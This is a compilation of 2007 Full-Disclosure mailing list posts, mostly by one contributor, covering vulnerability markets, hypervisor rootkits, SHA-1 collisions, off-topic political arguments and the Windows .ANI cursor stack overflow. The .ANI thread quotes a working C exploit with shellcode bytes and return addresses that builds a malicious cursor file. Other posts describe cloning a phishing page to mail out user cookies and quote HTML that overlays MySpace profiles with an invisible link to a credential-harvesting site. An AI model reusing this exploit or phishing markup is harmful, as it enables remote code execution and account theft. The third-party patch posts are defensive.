You call security what we have today? Is so distant. Companies make sometimes millions and usually do not want to pay a little misery for things. Just sell broken things and then wait until somebody takes care to find broken stuff. They simply don't care about that. Only take action after something is found and there is public pressure. And sometimes not even knowing the information. Don't you think it would be a good idea to push them a little to do something for they very own clients? Hey that means you too. I believe that's more noble than selling them to the highest bidder, Is more noble to reward hard to do work that also requires a lot of knowledge which sometimes people does even takes time to even say thank you. but I understand some people have to put food on their families. You are completely right. And not only food. Hardware and software can be sometimes very expensive. Definitely is a kind of job that require resources, just to save more somewhere else. And don't worry about that website. It will never work being so close. A market is where everybody can buy/sell. That's far from it. Regards Waldo -- [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rutkowska faces ‘100% unde tectable malware’ challenge, teasing?
Blah blah blah. Please someone tell Rokowska that we know about what she calls blue pill since we where little kids. It was exposed *years ago* (1995 to be exact 12 years) by Mark A. Ludwig in his Giant Book of Computer viruses Page 391 from American Eagle Publications, Inc. Chapter Protected mode stealth Basically was moving the operating system into userland and running the virus in ring-0 making it almost undetectable. It was called Isnt not blue whatever. Yes well with vanderpool technology should be a lot easier given the hardware support. And guess what.. We are still alive even with a POC virus and it's source code available to the public. I hate that kind of noisy sensationalist press so much. That guy is always doing it. And btw I don't believe such thing to be totally undetectable. There's always a little catch. Regards Waldo On 6/30/07, Bipin Gautam [EMAIL PROTECTED] wrote: hi guys, ref: http://blogs.zdnet.com/security/?p=334 so are they teasing by making her the impossible challenge at this date? :) honeypot developers have been trying to battle the same issue of making the virtual machine emulate guest OS like the it is run in real hardware since some years now. ref: http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf But if Rutkowska or anyone is able to succeed to make it undetectable in current hardware that would be genius! -bipin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fight Censorship on Full-Disclosure
On 5/12/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote: Hello all, It was brought to my attention that this list has become moderated. Moderated? Is that correct? Please let me know. I once saw once something strange. An mail sent to the list months ago bouncing back to me. As a community, we must not stand for this! We must join together and fight the oppression. Calling for war is bad. Sometimes. I have decided to host a mirror of the censored materials on my website. As an American, I value free speech above all else, and will gladly give my life defending this content. Great then about the free speech. George Bush, you can kiss my ass. I didn't vote for you, and as far as I am concerned you are not my president and no matter how many of my Muslim brothers you massacre, I will not be intimidated and I will not remove this content from my website. ? Everyone, please download the following file and mirror it where ever you can. While it may seem cruel to the individuals named in here, remember the greater good. George Bush and his Marxist ways have no place here on our good list. http://www.krawetz.org/misc/censorship.txt What is that about? I mean some addresses of someone. What is that? A fake list of ppl or what? Could you please explain seems to me like something written by a kid. *00* intr0duktion -- ~el8 TEaM Maybe then we'll listen. - neal I am the last free man in America. - Dr. Neal Krawetz, PhD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INVASION OF THE CHILD HACKERS
On 4/16/07, Stack Smasher [EMAIL PROTECTED] wrote: My daughter is 3 and she has had a laptop of her own since she was 2. You would be amazed at how much more she likes going to the 6-7 sites I have bookmarked for her then watching TV. Sesame Street and Nick Jr. are her most favorite. My parents where over a few weeks ago and where shocked when she not only plugged in the laptop into the wall socket, but turned it on and went to her favorite web page. Needless to say when she goes to school she will probably know more than her instructor, I believe that there is a huge digital divide in the world and I want to make sure my child is comfortable with technology that is CRITICAL for her success in the future. Or... her complete failure. Someday the little child could be hitting warez, mscracks, crackspider or maybe rotten.com (just to mention some of the most known) going just out there or a more strange address you are not aware of to look for the key to run that little great game that refuses to run because is protected and... Guess what he/she will see ;) I really doubt that a 3 years old kid (and I definitely don't believe in that number 2 you said can even type at the keyboard) can handle that avalanche of pornography and violence without burning/twisting their little brain. If I where a parent I would wait a little more time until that technology could be maybe critical as you call it instead of playing the geek parent that teaches his kid to go earlier. Nope filters are not very smart and the internet is WILD and only takes a couple of clicks before you land on a very strange place. And we all know that. Given the fact that now there is even emulation on that Is really scary the little monsters that are being built out there. Hey sometimes I can't even handle rotten.com and I am not a teen since quite some time ago. Some day I just decided not to visit that website anymore imagine a little kid's brain. Hey you could even misspell Yahoo or Google and get hacked or get the avalanche in front of your face. Or maybe type some random stuff into a search engine. Guess what, robots are not smart enough to get that kind of stuff out if their index and believe me those guys are busier taking out competence and copyrighted material out of the index than actually caring about taking out that kind of content. Ohh I forgot, you can also download an exe and execute a little *program* that automatically tells you enjoy hot fresh hotties. Sure no problem the little hacker will be able to debug it before that happens right? Ohh yeahh I forgot the antivirus will be smart enough to catch a modified version of morphine or Yoda's protector ;) Regards Waldo On 4/16/07, Dr. Neal Krawetz, PhD [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I just came across this article: More Women Online. The article starts by saying: eMarketer estimates that there will be an estimated 97.2 million female Internet users ages 3 and older in 2007, or 51.7% of the total online population. In 2011, 109.7 million US females will go online and amounting to 51.9% of the total online population. Estimates from other research sources concur that females represent the majority of US Internet users, ranging from 53% (Arbitron and Edison Media Research and for Internet users ages 12 and older) down to 50.6% (comScore Media Metrix and for Internet users ages 2 and older). The increase in women online is only moderately interesting. Particularly since surveys from a year ago reported that a majority of Internet users under 30-years-old are female. However and the thing that really got my attention was the age range. They say ages 3 and older. What kind of 3-year-old is surfing the web and using IM, and sending email? Between 3 and 5 years old and most children are just starting to learn the alphabet. The average 5-year-old should be able to read simple words. Granted, there are some online games for tots and is that really the same as using the Internet? (Use a VCR or DVD player? Sure and I've seen 2-year-olds do that… But a tot surfing the web? Really?) All of this makes me wonder… How soon before the RIAA begins suing 3-year-olds for illegal downloads? I mean and they have already gone after a 7-year-old. (And the 7-year-old was female. Coincidence? I think not!) Also, with this many young females online, I might need to trade my significant other M. in for a more attractive model. ;-) EHAP WATCH OUT! - - Dr. Neal Krawetz Author of Advanced Desktop Window Resizing Techniques in Ubuntu -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkYjcY8ACgkQDpFP8dW5K4ZbCgP/c5Tqp/4Z6QE6FB43gvasKxwm3KA4 66zC/HjQMM5jC/SxMBHk759K/q9dq9nVv4oaR1Osg1rYrctiLE4aEwPSVzBW9OHNLQKH Hq97z7LYpORPqYz3mq2VHtlFZ0nzyxucrR8iFlKRONmG3XH5ayIB4ByEr/WJwjs4l4eV KwGxFrs= =aXrc -END PGP SIGNATURE- --
Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Hello: Firefox 2.0.0.3 (at least in windows) *seems to be vulnerable*. I don't remember exactly what it did but it behaved in a strange way I believe some file handle was left open and had to kill it the hard way. I don't know what they say in the docs but if it ends up calling the user32 function and that's all it takes to trigger the bug. I was taking a peek at it's import tables and It imports from User32 the function LoadCursorA maybe that could be the guilty one. anyway test here and see what happens (that link is from dev code) http://sicotik.com/ink/test.html I'm not vulnerable anymore since quite some time ;) and I don't have much time to test right now Regards Waldo On 4/8/07, Michal Majchrowicz [EMAIL PROTECTED] wrote: Hi. There are more and more reports about FF and ani vulnerability. There was already a presentation of working exploit. The thing starts to annoy me and since I am far away from any windows I wanted to share some of my speculations. According to docs two things are obvious: 1) Firefox doesn't support ANI cursors 2) ANI is just few cur cursors packed together and presented as an animation. So i have three possible ways of exploiting it: 1) Since ANI files are vulnerable then maybe cur files are also vulnerable. Firefox does support CUR files. 2) If firefox doesn't support ANI files it only means it doesn't render them. It doesn't mean it will not acept them in any way:) 3) Maybe it is possible to rename foo.ani and rename it to foo.cur. Then FF will call win api with this cursor. Windows API will recognize this as ANI file and call vulnerable function . As I said before these are just speculation. I hope someone will be able to confirm or prove that some of them (or all) have no sense. Happy Easter to everyone. Regards Michal. On 4/4/07, Peter Ferrie [EMAIL PROTECTED] wrote: That's correct, Firefox doesn't support ANI files for cursors. Right, and it doesn't need to, because cursors are not the only way to reach the vulnerable code. Icons can do it, too. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] another .ani 0-day bug third party patcher more usefull this time, version 0.2
Get it here binary: http://aircash.sourceforge.net/micro-distro-0.2-bin.zip sources: http://aircash.sourceforge.net/micro-distro-0.2-src.zip Regards Waldo Alvarez ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows .ANI LoadAniIcon third party patch latest version 0.3 (so people can rollback their system before applying the patches)
Hello: I see that today I'm getting downloads from the website. Incredible yesterday (1:27 am here in -5 GMT) got more than the first day. Well anyway that could be maybe because people doesn't know that the Microsoft patch is out there or... just want to see. Who knows? Well previous versions were not completely finished since they didn't contained the unpatch part (however seems that was usefull for some people since got no complaints and some downloads(93) after the first release) However I have no idea of how many people is using it, I assume that should be more than 93 since some distribution should have taken other ways (e-mails, other websites, etc) . Well If you used the patch and want to uninstall it (I strongly recommend that), use this version before applying the patch from Microsoft to make sure everything goes OK, I have no idea if it gives problems or not to apply the microsoft patch on top of mine. If doing that doesn't gives problems well was decided to finish it anyway. I am the kind who likes to be sure and not to take chances as much as possible. By the way you don't need the saved backup. I am just patching the patched version with the original bytes. That should make ppl loose less time (no need to search for the backup) while doing the restoration ;). I did it that way too since was not going to take me much time as it was basically the same. I just copied that code instead of making a function buy hey ... who cares? And.. yes string handling should be pretty broken in the two latest versions but again. Who cares? There was no time for that with a worm out there infecting even banks. Yes I know a couple that use windows in their servers and in internal networks I hope that they are all up to date by now but I doubt it. Sometimes years later you see the vulnerability in some places. Enough talk for now, let me know if something is wrong to fix it, or... fix it yourself. I gotta sleep. binaries here: http://aircash.sourceforge.net/micro-distro-0.3-bin.zip sources here: http://aircash.sourceforge.net/micro-distro-0.3-src.zip Regards Waldo Alvarez ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] More information on ZERT patch for ANI 0day
Well I did my patch and I'm giving it away to be modifiable by everyone out there. I did it for version 5.1.2600.2622 of user32.dll, English version not sure if that is the last version from M$ (with the way they handle patches you know you could miss one) anyway in any case I believe there is enough information in the sources if it needs a fix or... not if Microsoft really comes with a patch tomorrow. So far you don't have to be at the mercy of the chinese worm or evil random cracker. Let me know if is a POS if has bugs etc... Maybe is not needed by tomorrow but was already doing it. So if it helps.. Then great!! download binaries here http://aircash.sourceforge.net/micro-distro-src.zip and sources here http://aircash.sourceforge.net/micro-distro-bin.zip just my 2 cents Regards Waldo On 4/1/07, Gadi Evron [EMAIL PROTECTED] wrote: Hi, more information about the patch released April 1st can be found here: http://zert.isotf.org/ Including: 1. Technical information. 2. Why this patch was released when eeye already released a third party patch. The newly discovered zero-day vulnerability in the parsing of animated cursors is very similar to the one previously discovered by eEye that was patched by Microsoft in MS05-002. Basically an anih chunk in an animated cursor RIFF file is read into a stack buffer of a fixed size (36 bytes) but the actual memory copy operation uses the length field provided inside the anih chunk.giving an attacker an easy route to overflow the stack and gain control of the execution of the process. With the MS05-002 patch, Microsoft added a check for the length of the chunk before copying it to the buffer. However, they neglected to audit the rest of the code for any other instances of the vulnerable copy routine. As it turns out, if there are two anih chunks in the file, the second chunk will be handled by a separate piece of code which Microsoft did not fix. This is what the authors of the zero-day discovered. Although eEye has released a third-party patch that will prevent the latest exploit from working, it doesn't fix the flawed copy routine. It simply requires that any cursors loaded must reside within the Windows directory (typically C:\WINDOWS\ or C:\WINNT\). This approach should successfully mitigate most drive-by's, but might be bypassed by an attacker with access to this directory. For this reason, ZERT is releasing a patch which addresses the core of the vulnerability, by ensuring that no more than 36 bytes of an anih chunk will be copied to the stack buffer, thus eliminating all potential exploit paths while maintaining compatibility with well-formatted animated cursor files. Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
On 4/1/07, Larry Seltzer [EMAIL PROTECTED] wrote: The issue is that this only works with DEP turned off! Interesting point. I haven't seen this mentioned anywhere, including the Microsoft advisory (http://www.microsoft.com/technet/security/advisory/935423.mspx). Has anyone actually tested this with DEP on/off to be sure? Yes, winhex uses the function when you open the .ani and I don't have it running with DEP turned on and the same goes for firefox that also leaves the file openend when I openen web link dev sent me (already tested winhex with the address of exitprocess that btw seems to float around from system to system since the version dev sent me does not works for me and it works like a charm when I built it). I was talking with dev code about DEP bypassing btw, we think that is possible to exploit even with DEP ON . Just ideas for now. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry_seltzer/ Contributing Editor, PC Magazine [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Hello:
Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
immune (not even crashing). XP Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).
On 3/30/07, dev code [EMAIL PROTECTED] wrote:
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack
overflow
*error within the LoadAniIcon() [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which
could
* be exploited by remote attackers to execute arbitrary commands
by
*tricking a user into visiting a malicious web page or viewing an
email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include iostream
/* ANI Header */
unsigned char uszAniHeader[] =
\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68
\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00
\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02
\x61\x6E\x69\x68\xA8\x03\x00\x00;
/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49
\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42
\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32
\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a
\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c
\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57
\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50
\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d
\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f
\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a
\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76
\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65
\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78
\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f
\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65
\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d
\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31
\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69
\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61
\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70
\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42;
char szIntro[] =
\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n
\t\t\tdevcode (c) 2007\n
[+] Targets:\n
\tWindows XP SP2 [0]\n
\tWindows 2K SP4 [1]\n\n
Usage: ani.exe target file;
typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;
TARGET targets[] = {
{ Windows XP SP2, \xC9\x29\xD4\x77 }, /* call esp */
{ Windows 2K SP4, \x29\x4C\xE1\x77 }
};
int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;
if ( argc 3 ) {
printf(%s\n, szIntro );
return 0;
}
printf([+] Creating ANI header...\n);
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
printf([+] Copying shellcode...\n);
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1
);
printf(%s\n, argv[2] );
f = fopen( argv[2], wb );
if ( f == NULL ) {
printf([-] Cannot create file\n);
return 0;
}
fwrite( szBuffer, 1, 1024, f );
fclose( f );
Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)
Hello: On 3/24/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Sat, 24 Mar 2007 11:48:10 CDT, wac said: Of course not, is enough to find a collision and you'll get for example a message signed by somebody else that looks completely authentic since signatures encrypt that hash with the private key. No, if you have a signature to some text, you need to find a collision to a specified value - the one the signature covers. That is what I mean. If original hash was 0x1234 (assuming 16 bits) and you want a signed text that looks signed by the private keys holder you have to construct a text with the same 0x1234 hash. There is where collisions would come into the game. For instance, if you have a 16 bit hash, finding two texts that both have a hash value of 0x1F6E doesn't do you much good if the signature is for 0x4ED2. And due to the birthday paradox, finding any pair of colliding hashes is a lot easier than finding a collision to a specific hash. We are assuming that it was cracked right? I believe that it means if you can find something let's call it Y that has the same output from the hash function as the original H(X) = H(Y) let's call the original signed content X. Of course does not seems to me that SHA-1 was cracked, it was IMHO at most weakened and some collision was found but to call it cracked is well... too strong. In my opinion is a claim made by the one who claims it to be famous or something twisting a little the truth. To me something half true is a lie. Also I was not referring of course to find a pair of colliding hashes since that would be pointless (yes well maybe has some use who knows). We all know that they collide and collisions exist. The pigeon hole principle right? BTW somebody has a paper where that SHA-1 crack is clearly explained? I would like to read it and not trust such claims just because somebody says so (I don't mean that is not true just want to think by myself, it could be possible that some rounds could be... well... simplified). Haven't found any paper about it. Just things like this http://theory.csail.mit.edu/~yiqun/shanote.pdf that just gives a collision example. But nothing about the weaknesses of the algorithm. And this is old news. BTW very interesting that birthday paradox. And being able to force a collision to a specific hash may not be very useful all by itself - for instance, if you're trying to collide the hash that the PGP signature covers in this message, you *might* be able to find a string of bits. But you won't be able to make it a *plausible* signature unless your string of bits is *also* a chunk of English text, that reads as if I wrote it. So not only do you need to be able to collide a specific hash, you need to do so with at least *some* control over the content of the text, which is even harder. Well you could add some garbage at the end of the message. In a text message would call attention that something is wrong (maybe because is signed and you would not be able to tell if the key holder signed a text with that garbage at the end or somewhere else), but not on binary content for example a driver or an executable image that simply skips the garbage that causes the collision when executed. Although a weakness will be of help to accomplish this, making the attack to take less time. However if the attack takes let's say 10 000 years instead of 1000 000 is well... almost the same thing. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] hi5 Antiphishing Departement
Yep it works. I cloned that and modified it to mail me the user cookie see http://bottester.hi5.com You have to be logged to make it work ok. Sometimes doesn't works correctly, it takes you to the home page. Try several times. No idea why. Sometimes when you modify your profile in hi5 you have to do it two or three times until it works. Maybe they have some broken code when updating the database. Adding the subject seems to break it, anyway works well as a phishing attack since you can tell the user to fill that field. On 3/24/07, beNi [EMAIL PROTECTED] wrote: I felt the need to extend the list of Antiphishing Departements of some Social Networks, so the Myspace Antiphishing Departement ( http://www.myspace.com/antiphishing ) got another friend, the hi5 Antiphishing Departement ( http://antiphishing.hi5.com ). Full blog post is available here: http://mybeni.rootzilla.de/mybeNi/2007/hi5_antiphishing_departement/ -- benjamin beNi flesch mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi (coolest guy in da hood) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)
Of course not, is enough to find a collision and you'll get for example a message signed by somebody else that looks completely authentic since signatures encrypt that hash with the private key. On 3/21/07, Blue Boar [EMAIL PROTECTED] wrote: 3APA3A wrote: First, by reading 'crack' I thought lady can recover full message by it's signature. After careful reading she can bruteforce collisions 2000 times faster. Cracking a hash would never mean recovering the full original message, except for possibly messages that were smaller than the number of bits in the hash value. There are an infinite number of messages that all hash to the same value. The best crack you can have for a hash is to be able collide with an existing hash value and be able to choose most of the message contents. BB ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wikipedia and Pedophilia
On 1/20/07, Timo Schoeler [EMAIL PROTECTED] wrote: In epistula a V Vendetta [EMAIL PROTECTED] die horaque Fri, 19 Jan 2007 13:29:53 -0800 (PST): Full Dislosure: Wikipedia (...) Also, I apologize for my english - as it is only my second language. The Wikipedia ideology is like communism - all the people working together in harmony - it sounds like... Peace. It's idealism at its highest level. no, the wikipedia ideology is NOT like communism. i even doubt they have something like an ideology. however, you should also apologize for your ranting about something (communism) you don't even know the basics of (i.e., it's definition). your superior system of capitalism destroys the planet for long time now. at least, we're getting at an end as climate change (carbon dioxide, methan, etc.) leads to mass extinctions within the next two decades (at a maxmimum) due to 'the weather being reconfigured around the planet'. I beleive that doesn't have anything to do with capitalism or whatever social system. Is about not using the right developement politics that's quite different. so in future those who cause this won't be able to satisfy their needs on burgers, hot dogs etc., thus not being able to drive their SUVs. nature will win :) You wanna be natural? Fine dress yourself with some animal skins(or maybe stay naked) do no take baths do not shave yourself and live till you get 30 years in cave eating roots you find somewhere or jeje killing animals and you will be quite natural. Ahh and forget about internet and computers because in the first place you won't have electricity, that is quite artificial. Ahh and forget about medicines they are man made. most interesting, alas Cuba is on its way to communism (no, it is no communism there, this is socialism, the first step to) Sure they are doing quite well. I beleive you are talking about something you don't know. Have you ever been there? because I do is the only country with sustainable development (*although* the US put an embargo on them *decades* ago): And you still beleive those lies from the government? Ahh come on you eate the cake. Have ever heard of some government that does't twist the truth? http://www.panda.org/news_facts/publications/key_publications/living_planet_report/index.cfm capitalism is about exponential, endless growth; I beleive that's the natural way of growing things. After all that's what is civilization about otherwise we were only small tribes trying to not die of hunger instead of having a society. the physician will say that this is not possible because the universe is not endless. Hmm I beleive you have to read some more about that. Anyway in case it is not infinite is so huge (I believe you still don't understand how much, is like our entire galaxy is a little grain of sand on a beach, in fact less than that) that you can assume it is for the next hmm... billions of bilions of years to come. And that things they say about energy and oil... Jaj the Sun is there wasting millions of megawatts every second throwing them to the space and you all talk about some stupid oil or carbon that is going to reach its end by some X year instead putting all of your efforts into finding ways to get that energy shining in front of your face. And then if the Sun becomes dead some day then there are billions of other stars out there. As said Einstein there are two infinite things, the universe and human stupidity So in my opinion is a very stupid idea that one of stoping developement with such excuses. the doctor will tell you that the only thing that achieves this is: cancer. (which, as capitalism, is its own murderer :) (...) V haef phun, t. - at least anticapitalist and still waiting for a _single_ democracy that works as the definition says. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Grab a myspace credential
On 1/16/07, Deepan [EMAIL PROTECTED] wrote: On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote: but at some point all this abuse will likely start sending users off to another service. thats only --if the know if they are being abused.. most of them are not coherent about any such issues.. On 1/15/07, Kevin Pawloski [EMAIL PROTECTED] wrote: The level of phishing sites targeting MySpace and bot related It is not quiet easy to fool 56000+ users using phishing sites. I wonder how Mark is doing it. Hmm... Oh no is very easy, yes very easy what he is doing. He left some traces on some of the cracked accounts, I was expectig of somebody to comment earlier since I've been a couple of hours since the initial post. When you modify a profile you can add this to the data of the profile, you know those HTML customizations. I found this on one of the accounts that really got my attention a little bit more than the girl of the account :P HOLAa style=text-decoration:none;position: absolute;top:1px;left:1px; href=http://marcolano.com/login/;img style=border-width:0px;width:2024px; height:1768px; src= http://x.myspace.com/images/clear.gif;/aa style=text-decoration:none;position: absolute;top:1px;left:1px; href= http://marcolano.com/login/;img style=border-width:0px;width:2024px; height:1768px; src=http://x.myspace.com/images/clear.gif;/aembed allowScriptAccess=never allowNetworking=internal enableJSURL=false enableHREF=false saveEmbedTags=true src= http://www.../mov/cid_3277_f.mov; width=1 height=1 As you might see, this creates a huge invisible link in the page in front of everything, so when you click into anything on the page like a link or anything it will take you to that phising website so ppl beleive that the account expired and enter their user+pass. Now I beleive that his message was a way to tell about a BUG in myspace that should filter that content and it is not doing it. So... we are in fact not talking about a stupid phishing website for those who still beleive that. Regards Waldo activity that has been targeting MySpace lately is pretty alarming. Granted there is no real financial risk if an account gets compromised for the user but at some point all this abuse will likely start sending users off to another service. Kevin On 1/15/07, North, Quinn [EMAIL PROTECTED] wrote: [EMAIL PROTECTED] :doyouhonestlythinkiwillputmyrealpass wordhere ...at least there is some hope left in the world :-\ --=Q=-- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Emma Perdue Sent: Monday, January 15, 2007 7:48 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Grab a myspace credential 56000+ and counting http://www.marcolano.com/login/myspace.txt -- *Emma aka TINK* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- --- Regards Deepan Chakravarthy N http://www.codeshepherd.com/ http://sudoku-solver.net/ I am a programmer by day, I dig grave for other programmers by night. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: 